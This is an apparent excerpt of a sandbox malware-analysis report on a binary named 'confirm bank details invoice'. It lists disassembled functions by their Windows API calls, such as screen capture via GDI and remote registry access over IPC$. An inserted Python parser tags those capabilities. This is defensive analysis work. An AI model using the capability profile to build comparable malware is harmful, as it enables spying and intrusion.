                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 3b3cc416460b1ed039c4cc5c016540de8f6e217699805749a81ad295aaf1f3e5
                    • Instruction ID: 5c8e519bb7f2d2ae08db06a7ddb27ca2e0ec1bd2770194bd4b4561de49f6e573
                    • Opcode Fuzzy Hash: 3b3cc416460b1ed039c4cc5c016540de8f6e217699805749a81ad295aaf1f3e5
                    • Instruction Fuzzy Hash: 03814670504301AFDB20DF25C894A6FBBE9BB88318F00492FF99697391D734D909CB9A
                    APIs
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                      • Part of subcall function 004AABBB: GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                      • Part of subcall function 004AABBB: GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                      • Part of subcall function 004AABBB: HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                      • Part of subcall function 004AAC56: GetProcessHeap.KERNEL32(00000008,004AA6B5,00000000,00000000,?,004AA6B5,?), ref: 004AAC62
                      • Part of subcall function 004AAC56: HeapAlloc.KERNEL32(00000000,?,004AA6B5,?), ref: 004AAC69
                      • Part of subcall function 004AAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004AA6B5,?), ref: 004AAC7A
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004AA8CB
                    • _memset.LIBCMT ref: 004AA8E0
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004AA8FF
                    • GetLengthSid.ADVAPI32(?), ref: 004AA910
                    • GetAce.ADVAPI32(?,00000000,?), ref: 004AA94D
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004AA969
                    • GetLengthSid.ADVAPI32(?), ref: 004AA986
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004AA995
                    • HeapAlloc.KERNEL32(00000000), ref: 004AA99C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004AA9BD
                    • CopySid.ADVAPI32(00000000), ref: 004AA9C4
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004AA9F5
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004AAA1B
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004AAA2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: a998618aafe4419178c62acde79633beb718fc9d1ed2689f0f2a81af5fe0d4f4
                    • Instruction ID: d725828c861e6dd74fbec0a30e832c60b17828f403f885ae892d25d755da2f95
                    • Opcode Fuzzy Hash: a998618aafe4419178c62acde79633beb718fc9d1ed2689f0f2a81af5fe0d4f4
                    • Instruction Fuzzy Hash: 21517075900109AFDF00DF91DD44EEEBBBAFF15304F04812AF911A7290DB389A25CB65
                    APIs
                    • GetDC.USER32(00000000), ref: 004C9E36
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004C9E42
                    • CreateCompatibleDC.GDI32(?), ref: 004C9E4E
                    • SelectObject.GDI32(00000000,?), ref: 004C9E5B
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004C9EAF
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 004C9EEB
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004C9F0F
                    • SelectObject.GDI32(00000006,?), ref: 004C9F17
                    • DeleteObject.GDI32(?), ref: 004C9F20
                    • DeleteDC.GDI32(00000006), ref: 004C9F27
                    • ReleaseDC.USER32(00000000,?), ref: 004C9F32
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 61c2d89923c842f898d691a7a92de63d0c9c2c89e9b332c6fb910ac1cf9ae87c
                    • Instruction ID: cace629eb48902700f48374827e02262b2ce18db647505944b83790f7e286c0b
                    • Opcode Fuzzy Hash: 61c2d89923c842f898d691a7a92de63d0c9c2c89e9b332c6fb910ac1cf9ae87c
                    • Instruction Fuzzy Hash: 53513B75900309EFCB14CFA8C889EAEBBB9EF48710F14842EF95997250C735AD41CB58
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 2889450990-2391861430
                    • Opcode ID: ce7da5269d1dbecb3326f8010e30e7f06dc8ad77c2d87b46939868b74561b8d8
                    • Instruction ID: eed000d30828e88dcc4c91c22988a620a90634595f06fde42474f9c8fdc362bd
                    • Opcode Fuzzy Hash: ce7da5269d1dbecb3326f8010e30e7f06dc8ad77c2d87b46939868b74561b8d8
                    • Instruction Fuzzy Hash: 0A51A331800109ABCF14EBE1DD86EEEB778EF05308F10416AF405761A1EB786F59DB68
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 2889450990-3420473620
                    • Opcode ID: 22f47dd45f536287f968969cd78deadb9a8c6197f7812460d6b47bf266a29a93
                    • Instruction ID: 575dd487aaf21bec7f85bc4d90a15f41ac1f7fc9f61fc1b17f020f534d8820ed
                    • Opcode Fuzzy Hash: 22f47dd45f536287f968969cd78deadb9a8c6197f7812460d6b47bf266a29a93
                    • Instruction Fuzzy Hash: 8F51A431800519AACF14EBE1DD86EEEBB78EF15304F10406AB109721A2DB786F59DF69
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: $ER$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-1405334128
                    • Opcode ID: 1ed4fefd684c6d66a21a72b8436ecc5d22ce4bd355e5928ff98ce04c1c413690
                    • Instruction ID: 0046dce7b536e69ce6b494d3cedb7070d2a8c50e114b68e1d4953ff9f3ae21f3
                    • Opcode Fuzzy Hash: 1ed4fefd684c6d66a21a72b8436ecc5d22ce4bd355e5928ff98ce04c1c413690
                    • Instruction Fuzzy Hash: 644130316142499BDF00EF11E8616EF3766BF13345F10481BEC951B396EB78AA0ACF59
                    APIs
                    • _memset.LIBCMT ref: 004B55D7
                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 004B5664
                    • GetMenuItemCount.USER32(00531708), ref: 004B56ED
                    • DeleteMenu.USER32(00531708,00000005,00000000,000000F5,?,?), ref: 004B577D
                    • DeleteMenu.USER32(00531708,00000004,00000000), ref: 004B5785
                    • DeleteMenu.USER32(00531708,00000006,00000000), ref: 004B578D
                    • DeleteMenu.USER32(00531708,00000003,00000000), ref: 004B5795
                    • GetMenuItemCount.USER32(00531708), ref: 004B579D
                    • SetMenuItemInfoW.USER32(00531708,00000004,00000000,00000030), ref: 004B57D3
                    • GetCursorPos.USER32(?), ref: 004B57DD
                    • SetForegroundWindow.USER32(00000000), ref: 004B57E6
                    • TrackPopupMenuEx.USER32(00531708,00000000,?,00000000,00000000,00000000), ref: 004B57F9
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B5805
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 3993528054-0
                    • Opcode ID: 200966b486115da2531def57ff437379dafa4b8442264c318e2717f657b410a2
                    • Instruction ID: d36472a902a19f149e368a04c9e98804eb425c6e6bb1a3a0cc1cd7e4339ebe2d
                    • Opcode Fuzzy Hash: 200966b486115da2531def57ff437379dafa4b8442264c318e2717f657b410a2
                    • Instruction Fuzzy Hash: 3A71F270640605BEEB209B55CC49FEAFF65FF44368F240217F518AA2D1C7785820DBA9
                    APIs
                    • _memset.LIBCMT ref: 004AA1DC
                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004AA211
                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004AA22D
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004AA249
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004AA273
                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004AA29B
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004AA2A6
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004AA2AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                    • API String ID: 1687751970-22481851
                    • Opcode ID: eba71e615bbb0326d37ca8767acb7a7b32bebc288a4c098c801fb98ea151f44a
                    • Instruction ID: 6db10fe0a7b7a29fdf74ae0e969f89b6e8611ba2ba8d5d7015baccb5ad2b4048
                    • Opcode Fuzzy Hash: eba71e615bbb0326d37ca8767acb7a7b32bebc288a4c098c801fb98ea151f44a
                    • Instruction Fuzzy Hash: 3C411876C10229AECB15EBA5DC85DEEB778FF15304F40806AF805A7260EB74AE15CB94
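The report presents each analysed function as an APIs / Strings / Memory Dump Source / Similarity block, and the only way to work with hundreds of them is to parse that block format and tag the API sets mechanically. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the block text (as extracted from the report HTML), records each API call with its module and ref address, splits the String ID list, and tags a function when its API set contains a known capability pattern. The sample input is constructed from the GDI screenshot routine (GetDC, CreateCompatibleBitmap, StretchBlt, GetDIBits) and the remote-registry routine (WNetAddConnection2W, RegConnectRegistryW) listed above. The capability names and the regexes are the example's own, and so is the assumption that the fifth dotted field of the .sdmp file name is the Win32 page protection of the dumped region (0x20 for the region at 0x471000 matches PAGE_EXECUTE_READ for a .text section, 0x02 and 0x04 match the read-only and read-write data regions listed as Associated). Note that the report uses `$` as the separator in String ID, so a string that itself contains `$` (the `\IPC$` share name here) cannot be recovered unambiguously.

```python
"""Parse Joe Sandbox per-function analysis blocks and tag API capabilities (added example)."""
import re
from dataclasses import dataclass, field

# One "• Name.MODULE(args), ref: ADDR" line. The argument list and the comma are
# optional ("• _memset.LIBCMT ref: 004AA1DC"); subcall lines carry a prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),")
FUZZY_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)$")
STRINGS_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")

# Assumption: field 5 of "<idx>.<stage>.<id>.<base>.<prot>.<...>.sdmp" is the Win32 page protection.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# Capability patterns (example's own choice): a function is tagged when its direct
# (non-subcall) API set contains every API named in the pattern.
CAPABILITIES = {
    "screen capture (GDI bitblt to DIB)": {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "remote registry over SMB IPC$": {"WNetAddConnection2W", "RegConnectRegistryW"},
    "modifier-key state polling": {"GetAsyncKeyState", "GetKeyState"},
}


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)      # (name, module, ref, is_subcall)
    strings: list = field(default_factory=list)   # String ID entries, split on '$'
    fuzzy_hash: str = ""
    source_file: str = ""

    def api_names(self):
        return {name for name, _, _, sub in self.apis if not sub}

    def capabilities(self):
        names = self.api_names()
        return sorted(cap for cap, req in CAPABILITIES.items() if req <= names)

    def section_protection(self):
        parts = self.source_file.split(".")
        if len(parts) < 5:
            return None
        return PAGE_PROTECT.get(int(parts[4], 16), "unknown")


def parse_report(text):
    """Split report text into FunctionBlocks; a block starts at each bare 'APIs' header."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        if m := API_RE.match(line):
            current.apis.append((m["name"], m["module"], m["ref"], "subcall" in line))
        elif m := SOURCE_RE.match(line):
            current.source_file = m["file"]
        elif m := FUZZY_RE.match(line):
            current.fuzzy_hash = m["hash"]
        elif (m := STRINGS_RE.match(line)) and m["ids"]:
            # '$' is the report's separator, so a '$' inside a string (IPC$) is lost here.
            current.strings = [s for s in m["ids"].split("$") if s]
    return blocks


def summarize(blocks):
    return [{"first_ref": b.apis[0][2] if b.apis else None, "fuzzy_hash": b.fuzzy_hash,
             "protection": b.section_protection(), "capabilities": b.capabilities()}
            for b in blocks]


# Constructed sample: lines copied from two of the report's function blocks.
SAMPLE = r"""
APIs
• GetDC.USER32(00000000), ref: 004C9E36
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004C9E42
• CreateCompatibleDC.GDI32(?), ref: 004C9E4E
• SelectObject.GDI32(00000000,?), ref: 004C9E5B
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004C9EAF
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 004C9EEB
• DeleteDC.GDI32(00000006), ref: 004C9F27
• ReleaseDC.USER32(00000000,?), ref: 004C9F32
Strings
Memory Dump Source
• Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
Similarity
• String ID: (
• Instruction Fuzzy Hash: 53513B75900309EFCB14CFA8C889EAEBBB9EF48710F14842EF95997250C735AD41CB58
APIs
• _memset.LIBCMT ref: 004AA1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004AA211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004AA22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004AA249
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004AA2A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
Similarity
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• Instruction Fuzzy Hash: 3C411876C10229AECB15EBA5DC85DEEB778FF15304F40806AF805A7260EB74AE15CB94
"""

if __name__ == "__main__":
    for row in summarize(parse_report(SAMPLE)):
        print(row)
```

The second block's RegConnectRegistryW argument 80000002 is HKEY_LOCAL_MACHINE, so the tag reads as "connect to a remote machine's HKLM after mapping its IPC$ share", which in an AutoIt runtime is the RegRead-on-remote-host path rather than malware-specific logic; the point of tagging is to separate such runtime library functions from the parts of the binary worth reversing.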
                    APIs
                    • __swprintf.LIBCMT ref: 004B67FD
                    • __swprintf.LIBCMT ref: 004B680A
                      • Part of subcall function 0049172B: __woutput_l.LIBCMT ref: 00491784
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004B6834
                    • LoadResource.KERNEL32(?,00000000), ref: 004B6840
                    • LockResource.KERNEL32(00000000), ref: 004B684D
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004B686D
                    • LoadResource.KERNEL32(?,00000000), ref: 004B687F
                    • SizeofResource.KERNEL32(?,00000000), ref: 004B688E
                    • LockResource.KERNEL32(?), ref: 004B689A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004B68F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID: 5R
                    • API String ID: 1433390588-3278202610
                    • Opcode ID: 976d5d0b8725330a46d4388e5c82f8a701f4588da434957d6aa6758a79967bb5
                    • Instruction ID: 3669d706317a6b39538b69ea9621a0461f7712e95956fea19f6037252cb75fe6
                    • Opcode Fuzzy Hash: 976d5d0b8725330a46d4388e5c82f8a701f4588da434957d6aa6758a79967bb5
                    • Instruction Fuzzy Hash: A231937190121AABDB11AFA1DD45AFF7BA9FF08341F014826F901D2250E738DA21DBB8
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004E36F4,00000010,?,Bad directive syntax error,0050DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004B25D6
                    • LoadStringW.USER32(00000000,?,004E36F4,00000010), ref: 004B25DD
                    • _wprintf.LIBCMT ref: 004B2610
                    • __swprintf.LIBCMT ref: 004B2632
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004B26A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1080873982-4153970271
                    • Opcode ID: 04bf88c090eda57ceca55a614adef43a09c3e5c228c0efab908805f8fcf63d03
                    • Instruction ID: e1ce2a45e1eb5eb8b1b27fae5eae81a18e99242f221ec6d9e4f71a31d1353a2c
                    • Opcode Fuzzy Hash: 04bf88c090eda57ceca55a614adef43a09c3e5c228c0efab908805f8fcf63d03
                    • Instruction Fuzzy Hash: B921513180021ABFCF11AB91DC46EEE7B35FF19308F00446AF505660A2DB79A625DB65
                    APIs
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004B7B42
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004B7B58
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B7B69
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004B7B7B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004B7B8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: SendString
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 890592661-1007645807
                    • Opcode ID: 70f6052b2fb60cb68b3c7fd178cbe2b006f3154250fea3e088dfd7f69819f05a
                    • Instruction ID: 045a6870d99a8fac17f670f7e3111817e9ce934044b07286816ab6e3bf9d5758
                    • Opcode Fuzzy Hash: 70f6052b2fb60cb68b3c7fd178cbe2b006f3154250fea3e088dfd7f69819f05a
                    • Instruction Fuzzy Hash: 5B11C8A0A5026979DB24B362DC8ADFF7F7CEFD2B14F04042E7415A60D1DE681B45C9B4
                    APIs
                    • timeGetTime.WINMM ref: 004B7794
                      • Part of subcall function 0048DC38: timeGetTime.WINMM(?,75A8B400,004E58AB), ref: 0048DC3C
                    • Sleep.KERNEL32(0000000A), ref: 004B77C0
                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004B77E4
                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004B7806
                    • SetActiveWindow.USER32 ref: 004B7825
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004B7833
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004B7852
                    • Sleep.KERNEL32(000000FA), ref: 004B785D
                    • IsWindow.USER32 ref: 004B7869
                    • EndDialog.USER32(00000000), ref: 004B787A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 95006cd7fcd01b5b5d592fafd3d6d1f4c8d54b249b585085b925947ff613d643
                    • Instruction ID: 3744457b3fdb98824aebd2104aa58c098193920834b2dda9cba89784ee7e9671
                    • Opcode Fuzzy Hash: 95006cd7fcd01b5b5d592fafd3d6d1f4c8d54b249b585085b925947ff613d643
                    • Instruction Fuzzy Hash: 822142B4604205AFE7016B20EC89BB63F6AFB94748B104466F50682371CF7D5D19EB3D
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CoInitialize.OLE32(00000000), ref: 004C034B
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004C03DE
                    • SHGetDesktopFolder.SHELL32(?), ref: 004C03F2
